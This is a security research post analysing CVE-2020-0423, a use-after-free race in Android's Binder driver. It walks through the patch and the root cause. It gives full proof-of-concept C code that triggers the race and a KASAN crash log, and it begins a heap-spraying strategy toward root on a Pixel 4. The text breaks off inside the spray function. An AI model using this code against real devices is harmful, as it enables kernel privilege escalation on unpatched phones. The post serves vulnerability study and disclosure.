Exploiting a Single Instruction Race Condition in Binder

Post by Maxime Peterlin, Philip Pettersson, Alexandre Adamski, and Alex Radocea

Introduction

In the Android Security Bulletin of October, the vulnerability CVE-2020-0423 was made public with the following description:

In binder_release_work of binder.c, there is a possible use-after-free due to improper locking. This could lead to local escalation of privilege in the kernel with no additional execution privileges needed. User interaction is not needed for exploitation.

CVE-2020-0423 is yet another vulnerability in Android that can lead to privilege escalation. In this post, we will describe the bug and construct an exploit that can be used to gain root privileges on an Android device.

Root Cause Analysis of CVE-2020-0423

A Brief Overview of Binder

Processes on Android are isolated and cannot access each other's memory directly. However, they sometimes need to, whether to exchange data between a client and a server or simply to share information between two processes.

Interprocess communication on Android is performed by Binder. This kernel component provides a user-accessible character device which can be used to call routines in a remote process and pass arguments to them. Binder acts as a proxy between two tasks and is also responsible, among other things, for handling memory allocations during data exchange and for managing the lifespans of shared objects.

If you're not familiar with Binder's internals, we invite you to read articles on the subject, such as Synacktiv's "Binder Transactions In The Bowels of the Linux Kernel". It will come in handy to understand the rest of this post.

Patch Analysis and Brief Explanation

The patch for CVE-2020-0423 was upstreamed on October 10th in the Linux kernel with the following commit message:

binder: fix UAF when releasing todo list

When releasing a thread todo list when tearing down

a binder_proc, the following race was possible which

could result in a use-after-free:

- Thread 1: enter binder_release_work from binder_thread_release

- Thread 2: binder_update_ref_for_handle() -> binder_dec_node_ilocked()

- Thread 2: dec nodeA --> 0 (will free node)

- Thread 1: ACQ inner_proc_lock

- Thread 2: block on inner_proc_lock

- Thread 1: dequeue work (BINDER_WORK_NODE, part of nodeA)

- Thread 1: REL inner_proc_lock

- Thread 2: ACQ inner_proc_lock

- Thread 2: todo list cleanup, but work was already dequeued

- Thread 2: free node

- Thread 2: REL inner_proc_lock

- Thread 1: deref w->type (UAF)

The problem was that for a BINDER_WORK_NODE, the binder_work element

must not be accessed after releasing the inner_proc_lock while

processing the todo list elements since another thread might be

handling a deref on the node containing the binder_work element

leading to the node being freed.

This message gives a rough overview of the steps required to trigger a use-after-free (UAF) with this bug. These steps will be detailed in the next section. For now, let's look at the patch to understand where the vulnerability comes from.

In essence, the patch inlines the content of the function binder_dequeue_work_head into binder_release_work. The only difference is that the type field of the binder_work struct is read while the lock on proc is still held.

// Before the patch

static struct binder_work *binder_dequeue_work_head(

struct binder_proc *proc,

struct list_head *list)

{

struct binder_work *w;

binder_inner_proc_lock(proc);

w = binder_dequeue_work_head_ilocked(list);

binder_inner_proc_unlock(proc);

return w;

}

static void binder_release_work(struct binder_proc *proc,

struct list_head *list)

{

struct binder_work *w;

while (1) {

w = binder_dequeue_work_head(proc, list);

/*

* From this point on, there is no lock on `proc` anymore

* which means `w` could have been freed in another thread and

* therefore be pointing to dangling memory.

*/

if (!w)

return;

switch (w->type) { /* <--- Use-after-free occurs here */

// [...]

// After the patch

static void binder_release_work(struct binder_proc *proc,

struct list_head *list)

{

struct binder_work *w;

enum binder_work_type wtype;

while (1) {

binder_inner_proc_lock(proc);

/*

* Since the lock on `proc` is held while calling

* `binder_dequeue_work_head_ilocked` and reading the `type` field of

* the resulting `binder_work` struct, we can be sure its value has not

* been tampered with.

*/

w = binder_dequeue_work_head_ilocked(list);

wtype = w ? w->type : 0;

binder_inner_proc_unlock(proc);

if (!w)

return;

switch (wtype) { /* <--- Use-after-free not possible anymore */

// [...]

Before this patch, it was possible to dequeue a binder_work struct, have another thread free and reallocate it, and thereby change the control flow of binder_release_work. The next section gives a more thorough explanation of why this behavior occurs and how it can be triggered at will.
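To make the locking pattern concrete, here is a minimal userland sketch of the patched approach. It is not the kernel code: work_item, work_queue and dequeue_with_type are hypothetical stand-ins, and a pthread mutex plays the role of the inner proc lock. The only point is that the type is copied while the lock is held, so later changes to the dequeued item cannot affect the value used afterwards.

```c
#include <pthread.h>
#include <stddef.h>

/* Hypothetical stand-ins for binder_work and a todo list. */
struct work_item {
    struct work_item *next;
    int type;
};

struct work_queue {
    pthread_mutex_t lock;
    struct work_item *head;
};

/*
 * Patched pattern: dequeue the head and copy its `type` while the lock is
 * still held. Returns the dequeued item (or NULL) and stores the snapshot
 * in *type_out (0 when the queue is empty).
 */
static struct work_item *dequeue_with_type(struct work_queue *q, int *type_out)
{
    struct work_item *w;

    pthread_mutex_lock(&q->lock);
    w = q->head;
    if (w)
        q->head = w->next;
    *type_out = w ? w->type : 0;
    pthread_mutex_unlock(&q->lock);

    return w;
}
```

A caller would then switch on the snapshot rather than dereferencing the item again once the lock has been released.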

In-Depth Analysis



In this section, as an example, let's imagine that there are two processes communicating using binder: a sender and a receiver.

At this point, there are three prerequisites to trigger the bug:

- a call to binder_release_work from the sender's thread

- a binder_work structure to dequeue from the sender thread's todo list

- a free on the binder_work structure from the receiver thread

Let's go over them one by one and try to figure out a way to fulfill them.

Calling binder_release_work

This prerequisite is pretty straightforward. As explained earlier, binder_release_work is part of the clean up routine when a task is done using binder. It can be called explicitly in a thread using the ioctl command BINDER_THREAD_EXIT.

// Userland code from the exploit

int binder_fd = open("/dev/binder", O_RDWR);

// [...]

ioctl(binder_fd, BINDER_THREAD_EXIT, 0);

This ioctl will end up calling the kernel function binder_ioctl located at drivers/android/binder.c.

binder_ioctl will then reach the BINDER_THREAD_EXIT case and call binder_thread_release. thread is a binder_thread structure containing information about the current thread which made the ioctl call.

static long binder_ioctl(struct file *filp, unsigned int cmd, unsigned long arg)

{

// [...]

case BINDER_THREAD_EXIT:

binder_debug(BINDER_DEBUG_THREADS, "%d:%d exit\n",

proc->pid, thread->pid);

binder_thread_release(proc, thread);

thread = NULL;

break;

// [...]

Near the end of binder_thread_release appears the call to binder_release_work.

static int binder_thread_release(struct binder_proc *proc,

struct binder_thread *thread)

{

// [...]

binder_release_work(proc, &thread->todo);

binder_thread_dec_tmpref(thread);

return active_transactions;

}

Notice that the call to binder_release_work has the value &thread->todo for the parameter struct list_head *list. This will become relevant in the following section when we try to populate this list with binder_work structures.

static void binder_release_work(struct binder_proc *proc,

struct list_head *list)

{

struct binder_work *w;

while (1) {

w = binder_dequeue_work_head(proc, list); /* dequeues from thread->todo */

if (!w)

return;

// [...]

Now that we know how to trigger the vulnerable function, let's determine how we can fill the thread->todo list with arbitrary binder_work structures.

Dequeueing a binder_work Structure of the Sender Thread

binder_work structures are enqueued into thread->todo at two locations:

static void

binder_enqueue_deferred_thread_work_ilocked(struct binder_thread *thread,

struct binder_work *work)

{

binder_enqueue_work_ilocked(work, &thread->todo);

}

static void

binder_enqueue_thread_work_ilocked(struct binder_thread *thread,

struct binder_work *work)

{

binder_enqueue_work_ilocked(work, &thread->todo);

thread->process_todo = true;

}

These functions are used in different places in the code, but an interesting code path is the one starting in binder_translate_binder. This function is called when a thread sends a transaction containing a BINDER_TYPE_BINDER or a BINDER_TYPE_WEAK_BINDER.

A binder node is created from this binder object and the reference counter for the process on the receiving end is increased. As long as the receiving process holds a reference to this node, it will stay alive in Binder's memory. However, if the process releases the reference, the node is destroyed, which is what we will try to achieve later on to trigger the UAF.
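The lifetime rule described here can be pictured with a toy reference counter. This is only a sketch under strong simplifications: counted_node, counted_node_get and counted_node_put are hypothetical names, and a single counter replaces Binder's separate strong, weak and internal counts.

```c
#include <stdbool.h>

/* Hypothetical, heavily simplified node with a single reference counter. */
struct counted_node {
    int refs;
    bool freed;
};

/* Takes one reference on the node. */
static void counted_node_get(struct counted_node *n)
{
    n->refs++;
}

/* Drops one reference; returns true when the last one is gone. */
static bool counted_node_put(struct counted_node *n)
{
    if (--n->refs == 0) {
        n->freed = true; /* the kernel would free the node at this point */
        return true;
    }
    return false;
}
```

As long as one holder remains, the put operation leaves the node alone; only the last release marks it as freed, which is the event the exploit tries to provoke at the right moment.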

First, let's explain how the binder node and the thread->todo list are related in the call to binder_inc_ref_for_node.

static int binder_translate_binder(struct flat_binder_object *fp,

struct binder_transaction *t,

struct binder_thread *thread)

{

// [...]

ret = binder_inc_ref_for_node(target_proc, node,

fp->hdr.type == BINDER_TYPE_BINDER,

&thread->todo, &rdata);

// [...]

}

binder_inc_ref_for_node parameters are as follows:

- struct binder_proc *proc: process that will hold a reference to the node

- struct binder_node *node: target node

- bool strong: true=strong reference, false=weak reference

- struct list_head *target_list: worklist to use if node is incremented

- struct binder_ref_data *rdata: the id/refcount data for the ref

target_list in our current path is thread->todo. This parameter is only used in binder_inc_ref_for_node in the call to binder_inc_ref_olocked.

static int binder_inc_ref_for_node(struct binder_proc *proc,

struct binder_node *node,

bool strong,

struct list_head *target_list,

struct binder_ref_data *rdata)

{

// [...]

ret = binder_inc_ref_olocked(ref, strong, target_list);

// [...]

}

binder_inc_ref_olocked then calls binder_inc_node whether it's a weak or a strong reference.

static int binder_inc_ref_olocked(struct binder_ref *ref, int strong,

struct list_head *target_list)

{

// [...]

// Strong ref path

ret = binder_inc_node(ref->node, 1, 1, target_list);

// [...]

// Weak ref path

ret = binder_inc_node(ref->node, 0, 1, target_list);

// [...]

}

binder_inc_node is a simple wrapper around binder_inc_node_nilocked holding a lock on the current node.

binder_inc_node_nilocked finally calls:

- binder_enqueue_deferred_thread_work_ilocked if there is a strong reference on the node

- binder_enqueue_work_ilocked if there is a weak reference on the node

In practice, it does not matter whether the reference is weak or strong.

static int binder_inc_node_nilocked(struct binder_node *node, int strong,

int internal,

struct list_head *target_list)

{

// [...]

if (strong) {

// [...]

if (!node->has_strong_ref && target_list) {

// [...]

binder_enqueue_deferred_thread_work_ilocked(thread,

&node->work);

}

} else {

// [...]

if (!node->has_weak_ref && list_empty(&node->work.entry)) {

// [...]

binder_enqueue_work_ilocked(&node->work, target_list);

}

}

return 0;

}

Notice here that it's actually the node->work field that is enqueued in the thread->todo list and not just a plain binder_work structure. It's because binder_node embeds a binder_work structure. This means that, to trigger the bug, we don't want to free a specific binder_work structure, but a whole binder_node.
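The relationship between the list entry and its enclosing node can be sketched in plain C. The structures below are simplified stand-ins (toy_work, toy_node and the helper names are hypothetical, and the real kernel structures have many more fields); the list helpers mimic the kernel's intrusive list_head, and container_of recovers the parent object from the embedded member.

```c
#include <stddef.h>

struct list_head { struct list_head *next, *prev; };

#define container_of(ptr, type, member) \
    ((type *)((char *)(ptr) - offsetof(type, member)))

/* Simplified stand-ins for binder_work and binder_node. */
struct toy_work { struct list_head entry; int type; };
struct toy_node { int debug_id; int lock; struct toy_work work; };

static void list_init(struct list_head *h) { h->next = h->prev = h; }

/* Links `item` just before `head`, i.e. at the tail of the list. */
static void list_add_tail(struct list_head *item, struct list_head *head)
{
    item->prev = head->prev;
    item->next = head;
    head->prev->next = item;
    head->prev = item;
}

/* Removes and returns the first work item, or NULL if the list is empty. */
static struct toy_work *dequeue_head(struct list_head *head)
{
    struct list_head *first = head->next;

    if (first == head)
        return NULL;
    first->prev->next = first->next;
    first->next->prev = first->prev;
    list_init(first);
    return container_of(first, struct toy_work, entry);
}

/* Recovers the node that embeds a given work item. */
static struct toy_node *node_of(struct toy_work *w)
{
    return container_of(w, struct toy_node, work);
}
```

The pointer returned by dequeue_head points inside the node, not at its start, so it is only valid for as long as the whole node is.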

At this stage, we know how to arbitrarily fill the thread->todo list and how to call the vulnerable function binder_release_work to access a potentially freed binder_work/binder_node structure. The only step that remains is to figure out a way to free a binder_node we allocated in our thread.

Freeing the binder_work Structure From the Receiver Thread

Up to this point, we only looked at the sending thread's side. Now we'll explain what needs to happen on the receiving end for the node to be freed.

The function responsible for freeing a node is binder_free_node.

static void binder_free_node(struct binder_node *node)

{

kfree(node);

binder_stats_deleted(BINDER_STAT_NODE);

}

This function is called in different places in the code, but an interesting path to follow is when binder receives a BC_FREE_BUFFER transaction command. The reason for choosing this code path in particular is twofold.

- The first thing to note is that not all processes are allowed to register as a binder service. While it's still possible to do it by abusing the ITokenManager service, we chose to use the already registered services (e.g. servicemanager, gpuservice, etc.).

- The second reason is that since we chose to communicate with existing services, we would have to use an existing code path inside one of those that would let us free a node.

Fortunately, this is the case for BC_FREE_BUFFER which is used by the binder service to clean up once the transaction has been handled. An example with servicemanager is given below.

In binder_parse, when replying to a transaction, servicemanager will either call binder_free_buffer, if it's a one-way transaction, or binder_send_reply.

int binder_parse(struct binder_state *bs, struct binder_io *bio,

uintptr_t ptr, size_t size, binder_handler func)

{

// [...]

switch(cmd) {

// [...]

case BR_TRANSACTION_SEC_CTX:

case BR_TRANSACTION: {

// [...]

if (func) {

// [...]

if (txn.transaction_data.flags & TF_ONE_WAY) {

binder_free_buffer(bs, txn.transaction_data.data.ptr.buffer);

} else {

binder_send_reply(bs, &reply, txn.transaction_data.data.ptr.buffer, res);

}

}

break;

}

// [...]

In both cases, servicemanager will answer with a BC_FREE_BUFFER. Now we can describe how this command is able to free the binder node that was created by the sending thread.

When the targeted service answers back with a BC_FREE_BUFFER, the transaction is handled by binder_thread_write. The execution flow will reach the BC_FREE_BUFFER case and, at the end, will call binder_transaction_buffer_release.

static int binder_thread_write(struct binder_proc *proc,

struct binder_thread *thread,

binder_uintptr_t binder_buffer, size_t size,

binder_size_t *consumed)

{

// [...]

case BC_FREE_BUFFER: {

// [...]

binder_transaction_buffer_release(proc, buffer, 0, false);

// [...]

}

// [...]

binder_transaction_buffer_release will then look at the type of the object stored in the buffer, in our case a BINDER_TYPE_WEAK_HANDLE or BINDER_TYPE_HANDLE (because binder objects are translated to handles when they go through binder), and start freeing them.

static void binder_transaction_buffer_release(struct binder_proc *proc,

struct binder_buffer *buffer,

binder_size_t failed_at,

bool is_failure)

{

// [...]

switch (hdr->type) {

// [...]

case BINDER_TYPE_HANDLE:

case BINDER_TYPE_WEAK_HANDLE: {

struct flat_binder_object *fp;

struct binder_ref_data rdata;

int ret;

fp = to_flat_binder_object(hdr);

ret = binder_dec_ref_for_handle(proc, fp->handle,

hdr->type == BINDER_TYPE_HANDLE, &rdata);

// [...]

} break;

// [...]

binder_transaction_buffer_release calls binder_dec_ref_for_handle, which is a wrapper for binder_update_ref_for_handle.

binder_update_ref_for_handle will decrement the reference on the handle, and therefore on the binder node, with binder_dec_ref_olocked.

static int binder_update_ref_for_handle(struct binder_proc *proc,

uint32_t desc, bool increment, bool strong,

struct binder_ref_data *rdata)

{

// [...]

if (increment)

ret = binder_inc_ref_olocked(ref, strong, NULL);

else

/*

* Decrements the reference count by one and returns true since it

* dropped to zero

*/

delete_ref = binder_dec_ref_olocked(ref, strong);

// [...]

/* delete_ref is true, the binder node is freed */

if (delete_ref)

binder_free_ref(ref);

return ret;

// [...]

}

The binder node is finally freed after the call to binder_free_node.

static void binder_free_ref(struct binder_ref *ref)

{

if (ref->node)

binder_free_node(ref->node);

kfree(ref->death);

kfree(ref);

}

CVE-2020-0423 in a Nutshell

To wrap up the analysis of the vulnerability, and before jumping into its exploitation, here's a brief rundown of the steps required to trigger the use-after-free.



First we need a user-controlled thread that will send transactions to a system-controlled binder service (e.g. servicemanager). The sender creates a transaction containing a BINDER_TYPE_BINDER and sends it to binder. Binder creates a binder_node corresponding to the BINDER_TYPE_BINDER object and sends it to servicemanager.





Right after, the sender stops the communication with binder using BINDER_THREAD_EXIT which will initiate the clean up process, ultimately calling the vulnerable function binder_release_work that will dequeue the binder node from the thread->todo list.





Finally, if the timing is right, the receiver will respond to our previous transaction with a BC_FREE_BUFFER freeing the binder node right after it's been dequeued and right before it's been used.

At this point, with some spraying, it would be possible to replace the binder node with another object and take control of the type field in the binder_work structure to modify the execution flow of binder.

static void binder_release_work(struct binder_proc *proc,

struct list_head *list)

{

struct binder_work *w;

while (1) {

w = binder_dequeue_work_head(proc, list);

if (!w)

return;

switch (w->type) { /* <--- Use-after-free occurs here */

// [...]

The next section will explain how to trigger this vulnerability with a simple proof of concept before detailing a full exploit that can be used to get root access on a Pixel 4 device.

Exploiting the Vulnerability

Writing a Proof of Concept

Before trying to write a complete exploit for this vulnerability, let's try to trigger the bug on a KASAN-enabled kernel running on a Pixel 4 device. The steps to build a KASAN kernel for a Pixel device are detailed here.

The proof of concept can be divided into three stages:

- generating a transaction capable of triggering the bug

- sending the transaction and BINDER_THREAD_EXIT to binder

- using multiple threads to trigger the race condition more effectively



First, let's have a look at the transaction we need to send. It requires at least one BINDER_TYPE_BINDER, or BINDER_TYPE_WEAK_BINDER, object. It's possible to send more than one to increase the chances of triggering the bug: the more nodes there are in thread->todo, the likelier it is that a given transaction triggers it.



Following Binder's transaction format, we could generate one with the following layout:

The following function can be used to create a transaction such as the one represented above.

/*

* Generates a binder transaction able to trigger the bug

*/

static inline void init_binder_transaction(int nb) {

/*

* Writes `nb` times a BINDER_TYPE_BINDER object in the object buffer

* and updates the offsets in the offset buffer accordingly

*/

for (int i = 0; i < nb; i++) {

struct flat_binder_object *fbo =

(struct flat_binder_object *)((void*)(MEM_ADDR + 0x400LL + i*sizeof(*fbo)));

fbo->hdr.type = BINDER_TYPE_BINDER;

fbo->binder = i;

fbo->cookie = i;

uint64_t *offset = (uint64_t *)((void *)(MEM_ADDR + OFFSETS_START + 8LL*i));

*offset = i * sizeof(*fbo);

}

/*

* Binder transaction data referencing the offset and object buffers

*/

struct binder_transaction_data btd2 = {

.flags = TF_ONE_WAY, /* we don't need a reply */

.data_size = 0x28 * nb,

.offsets_size = 8 * nb,

.data.ptr.buffer = MEM_ADDR + 0x400,

.data.ptr.offsets = MEM_ADDR + OFFSETS_START,

};

uint64_t txn_size = sizeof(uint32_t) + sizeof(btd2);

/* Transaction command */

*(uint32_t*)(MEM_ADDR + 0x200) = BC_TRANSACTION;

memcpy((void*)(MEM_ADDR + 0x204), &btd2, sizeof(btd2));

/* Binder write/read structure sent to binder */

struct binder_write_read bwr = {

.write_size = txn_size * (1), // 1 transaction

.write_buffer = MEM_ADDR + 0x200

};

memcpy((void*)(MEM_ADDR + 0x100), &bwr, sizeof(bwr));

}
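The offset arithmetic used by the function above can be checked in isolation. The sketch below assumes objects packed back to back and uses toy_flat_object, a hypothetical mirror of the 64-bit struct flat_binder_object, so that it builds without kernel headers; fill_offsets is likewise an illustrative helper and not part of the PoC. Note that the PoC passes 0x28 bytes per object in data_size, which is larger than the 24-byte mirror used here, and the sketch does not try to reproduce that value.

```c
#include <stddef.h>
#include <stdint.h>

/*
 * Hypothetical mirror of struct flat_binder_object (64-bit layout assumed),
 * redefined here so the sketch does not depend on the binder UAPI header.
 */
struct toy_flat_object {
    uint32_t type;    /* hdr.type */
    uint32_t flags;
    uint64_t binder;  /* union of binder pointer and handle */
    uint64_t cookie;
};

/*
 * Fills `offsets` with the byte offset of each of the `nb` objects packed
 * back to back in the data buffer, and returns the total size they occupy.
 */
static size_t fill_offsets(uint64_t *offsets, size_t nb)
{
    for (size_t i = 0; i < nb; i++)
        offsets[i] = i * sizeof(struct toy_flat_object);

    return nb * sizeof(struct toy_flat_object);
}
```

With three objects, the offsets buffer holds three 8-byte entries, one per object, which matches the `8 * nb` used for offsets_size.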

The next step is to open a communication channel with binder, send the transaction and close it with BINDER_THREAD_EXIT:

void *trigger_thread_func(void *argp) {

unsigned long id = (unsigned long)argp;

int ret = 0;

int binder_fd = -1;

int binder_fd_copy = -1;

// Opening binder device

binder_fd = open("/dev/binder", O_RDWR);

if (binder_fd < 0)

perror("An error occurred while opening binder");

for (;;) {

// Refill the memory region with the transaction

init_binder_transaction(1);

// Copying the binder fd

binder_fd_copy = dup(binder_fd);

// Sending the transaction

ret = ioctl(binder_fd_copy, BINDER_WRITE_READ, MEM_ADDR + 0x100);

if (ret != 0)

debug_printf("BINDER_WRITE_READ did not work: %d", ret);

// Binder thread exit

ret = ioctl(binder_fd_copy, BINDER_THREAD_EXIT, 0);

if (ret != 0)

debug_printf("BINDER_THREAD_EXIT did not work: %d", ret);

// Closing binder device

close(binder_fd_copy);

}

return NULL;

}

Finally, let's start multiple threads to try to trigger the bug quicker.

int main() {

pthread_t trigger_threads[NB_TRIGGER_THREADS];

// Memory region for binder transactions

mmap((void*)MEM_ADDR, MEM_SIZE, PROT_READ | PROT_WRITE,

MAP_PRIVATE | MAP_FIXED | MAP_ANONYMOUS, -1, 0);

// Init random

srand(time(0));

// Get rid of stdout/stderr buffering

setvbuf(stdout, NULL, _IONBF, 0);

setvbuf(stderr, NULL, _IONBF, 0);

// Starting trigger threads

debug_print("Starting trigger threads");

for (unsigned long i = 0; i < NB_TRIGGER_THREADS; i++) {

pthread_create(&trigger_threads[i], NULL, trigger_thread_func, (void*)i);

}

// Waiting for trigger threads

for (int i = 0; i < NB_TRIGGER_THREADS; i++)

pthread_join(trigger_threads[i], NULL);

return 0;

}

After starting the PoC on a vulnerable KASAN-enabled kernel, the following message should appear in dmesg after some time if the bug was successfully triggered:

<3>[81169.367408] c6 20464 ==================================================================

<3>[81169.367435] c6 20464 BUG: KASAN: use-after-free in binder_release_work+0x84/0x1b8

<3>[81169.367469] c6 20464 Read of size 4 at addr ffffffc053e45850 by task poc/20464

<3>[81169.367481] c6 20464

<4>[81169.367498] c6 20464 CPU: 6 PID: 20464 Comm: poc Tainted: G S W 4.14.170-g551313822-dirty_audio-g199e9bf #1

<4>[81169.367507] c6 20464 Hardware name: Qualcomm Technologies, Inc. SM8150 V2 PM8150 Google Inc. MSM sm8150 Flame (DT)

<4>[81169.367514] c6 20464 Call trace:

<4>[81169.367530] c6 20464 dump_backtrace+0x0/0x380

<4>[81169.367541] c6 20464 show_stack+0x20/0x2c

<4>[81169.367554] c6 20464 dump_stack+0xc4/0x11c

<4>[81169.367576] c6 20464 print_address_description+0x70/0x240

<4>[81169.367594] c6 20464 kasan_report_error+0x1a0/0x204

<4>[81169.367605] c6 20464 kasan_report_error+0x0/0x204

<4>[81169.367619] c6 20464 __asan_load4+0x80/0x84

<4>[81169.367631] c6 20464 binder_release_work+0x84/0x1b8

<4>[81169.367644] c6 20464 binder_thread_release+0x2ac/0x2e0

<4>[81169.367655] c6 20464 binder_ioctl+0x9a4/0x122c

<4>[81169.367680] c6 20464 do_vfs_ioctl+0x7c8/0xefc

<4>[81169.367693] c6 20464 SyS_ioctl+0x68/0xa0

<4>[81169.367716] c6 20464 el0_svc_naked+0x34/0x38

<3>[81169.367725] c6 20464

<3>[81169.367734] c6 20464 Allocated by task 20464:

<4>[81169.367747] c6 20464 kasan_kmalloc+0xe0/0x1ac

<4>[81169.367761] c6 20464 kmem_cache_alloc_trace+0x3b8/0x454

<4>[81169.367774] c6 20464 binder_new_node+0x4c/0x394

<4>[81169.367802] c6 20464 binder_transaction+0x2398/0x4308

<4>[81169.367816] c6 20464 binder_ioctl_write_read+0xc28/0x4dc8

<4>[81169.367826] c6 20464 binder_ioctl+0x650/0x122c

<4>[81169.367836] c6 20464 do_vfs_ioctl+0x7c8/0xefc

<4>[81169.367846] c6 20464 SyS_ioctl+0x68/0xa0

<4>[81169.367862] c6 20464 el0_svc_naked+0x34/0x38

<3>[81169.367868] c6 20464

<4>[81169.367936] c7 20469 CPU7: update max cpu_capacity 989

<3>[81169.368496] c6 20464 Freed by task 594:

<4>[81169.368518] c6 20464 __kasan_slab_free+0x13c/0x21c

<4>[81169.368534] c6 20464 kasan_slab_free+0x10/0x1c

<4>[81169.368549] c6 20464 kfree+0x248/0x810

<4>[81169.368564] c6 20464 binder_free_ref+0x30/0x64

<4>[81169.368584] c6 20464 binder_update_ref_for_handle+0x294/0x2b0

<4>[81169.368600] c6 20464 binder_transaction_buffer_release+0x46c/0x7a0

<4>[81169.368616] c6 20464 binder_ioctl_write_read+0x21d0/0x4dc8

<4>[81169.368653] c6 20464 binder_ioctl+0x650/0x122c

<4>[81169.368667] c6 20464 do_vfs_ioctl+0x7c8/0xefc

<4>[81169.368684] c6 20464 SyS_ioctl+0x68/0xa0

<4>[81169.368697] c6 20464 el0_svc_naked+0x34/0x38

<3>[81169.368704] c6 20464

<3>[81169.368735] c6 20464 The buggy address belongs to the object at ffffffc053e45800

<3>[81169.368735] c6 20464 which belongs to the cache kmalloc-256 of size 256

<3>[81169.368753] c6 20464 The buggy address is located 80 bytes inside of

<3>[81169.368753] c6 20464 256-byte region [ffffffc053e45800, ffffffc053e45900)

<3>[81169.368767] c6 20464 The buggy address belongs to the page:

<0>[81169.368779] c6 20464 page:ffffffbf014f9100 count:1 mapcount:0 mapping: (null) index:0x0 compound_mapcount: 0

<0>[81169.368804] c6 20464 flags: 0x10200(slab|head)

<1>[81169.368824] c6 20464 raw: 0000000000010200 0000000000000000 0000000000000000 0000000100150015

<1>[81169.368843] c6 20464 raw: ffffffbf04e39e00 0000000e00000002 ffffffc148c0fa00 0000000000000000

<1>[81169.368867] c6 20464 page dumped because: kasan: bad access detected

<3>[81169.368882] c6 20464

<3>[81169.368894] c6 20464 Memory state around the buggy address:

<3>[81169.368910] c6 20464 ffffffc053e45700: fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb

<3>[81169.368955] c6 20464 ffffffc053e45780: fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc

<3>[81169.368984] c6 20464 >ffffffc053e45800: fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb

<3>[81169.368997] c6 20464 ^

<3>[81169.369012] c6 20464 ffffffc053e45880: fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb

<3>[81169.369037] c6 20464 ffffffc053e45900: fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc

<3>[81169.369049] c6 20464 ==================================================================

Exploitation Strategy

It's one thing to trigger the use-after-free, but it's a whole other story to reach code execution using it. This section will try to explain how the bug can be exploited one step at a time and with, hopefully, enough details to understand the general thought process.

Our tests will be performed on a Pixel 4 device running the latest Android 10 factory image QQ3A.200805.001 released in August 2020, with no security updates. This factory image can be found on the Google developers website.

Use-After-Frees and the SLUB Allocator

The general idea behind a use-after-free, as its name suggests, is to keep using a dynamically-allocated object after it's been freed. What makes it interesting is that this freed object can now be replaced by another of a different layout to create a type confusion on specific fields of the original structure. Now when the exploited program continues to run, it will use the object that has been reallocated as if it was the original one, which could lead to a redirection of the execution flow.
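The type confusion can be replayed safely in userland by modelling one slab slot as a static byte array that outlives every "allocation". Everything below is hypothetical scaffolding (victim, spray, slot_alloc, the offset of the type field), chosen only to illustrate the idea; no memory is actually freed, so the sketch has no undefined behavior.

```c
#include <stdint.h>
#include <string.h>

#define SLOT_SIZE 128

/* One slab slot, modelled as raw bytes that are always valid to access. */
static unsigned char slot[SLOT_SIZE];

/* Hypothetical original object: the field of interest sits at offset 24. */
struct victim { uint64_t pad[3]; int32_t type; };

/* Hypothetical replacement object, fully attacker-controlled. */
struct spray { int32_t words[SLOT_SIZE / 4]; };

/* Toy allocator: every allocation lands in the same slot. */
static void *slot_alloc(void) { return slot; }

/* Reads `type` through a possibly stale pointer, as the buggy code would. */
static int32_t read_type(const void *stale)
{
    struct victim v;

    memcpy(&v, stale, sizeof(v));
    return v.type;
}

/* Replays: allocate the victim, "free" it, spray over it, use it again. */
static int32_t replay_use_after_free(int32_t sprayed)
{
    struct victim v = { .type = 1 };
    struct spray s = { .words = { 0 } };
    void *stale = slot_alloc();

    memcpy(stale, &v, sizeof(v));         /* original object in place */
    /* ... the object is freed here, but `stale` is kept around ... */
    s.words[6] = sprayed;                 /* byte offset 24 */
    memcpy(slot_alloc(), &s, sizeof(s));  /* replacement reuses the slot */

    return read_type(stale);              /* sees the sprayed value */
}
```

Reading through the stale pointer returns whatever the replacement object placed at that offset, not the value the original object held.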

Exploiting a use-after-free is highly dependent on the dynamic allocation system used. Android uses a system called the SLUB allocator.

Since this article is not about explaining how the SLUB allocator works, if you're not already familiar with it, we invite you to read resources on the subject, such as this one, to fully understand the rest of this post.

Essentially, the slab is divided into caches storing objects of a specific size or of a specific type. In our case, we want to reallocate over a binder_node object. A binder_node structure is 128 bytes long and does not have a dedicated cache on a Pixel 4 running Android 10, which means it's located in the kmalloc-128 cache. Therefore, we will need to spray using an object with a size less than or equal to 128 bytes, which will be discussed next.
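As a rough mental model, picking a general-purpose cache amounts to rounding the requested size up to the next available size class. The helper below is a simplified sketch, not the kernel's logic: toy_kmalloc_cache is a hypothetical name, only power-of-two classes are modelled, and the smallest class is passed in as a parameter (128 is assumed here for the target device).

```c
#include <stddef.h>

/*
 * Rounds `size` up to a power-of-two cache size, never below `min_cache`.
 * Simplified: real kernels may also provide non-power-of-two caches such
 * as kmalloc-96 or kmalloc-192. `min_cache` must be a non-zero power of two.
 */
static size_t toy_kmalloc_cache(size_t size, size_t min_cache)
{
    size_t cache = min_cache;

    while (cache < size)
        cache *= 2;

    return cache;
}
```

Under that assumption, any request of at most 128 bytes shares a cache with binder_node, while a 129-byte request would already land in the next class.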

Controlling the Switch Case in binder_release_work

We established earlier that the use-after-free could be used to control the switch/case argument in binder_release_work.

static void binder_release_work(struct binder_proc *proc,

struct list_head *list)

{

struct binder_work *w;

while (1) {

w = binder_dequeue_work_head(proc, list);

if (!w)

return;

switch (w->type) { /* <-- Value controlled with the use-after-free */

// [...]

default:

pr_err("unexpected work type, %d, not freed\n",

w->type);

break;

}

}

}

In this section we will spray the slab to change the value read by w->type and have it displayed by the default case.



The technique we will use to spray has been detailed in Project Zero's "Mitigations are attack surface, too" and relies on the use of sendmsg and signalfd.

- sendmsg allocates a 128-byte kernel object filled almost entirely with user-controlled data

- the sendmsg object is freed

- right after, a signalfd allocation is made, creating an 8-byte object (also part of the kmalloc-128 cache) that will most likely replace the previous sendmsg object, pinning its content in memory.

With this spraying technique, it's possible to obtain the following outcome that would give us control over w->type.

It's also possible to achieve the same effect with only blocking sendmsg, as explained in Lexfo's "CVE-2017-11176: A step-by-step Linux Kernel exploitation (part 3/4)". However, the exploit would be way slower and, as we will see in the next sections, signalfd plays an important role in the exploitation of this vulnerability.

A function similar to the one given below can be used to spray sendmsg and signalfd objects in kernel memory to control w->type.

void *spray_thread_func(void *argp) {

struct spray_thread_data *data = (struct spray_thread_data*)argp;

int delay;

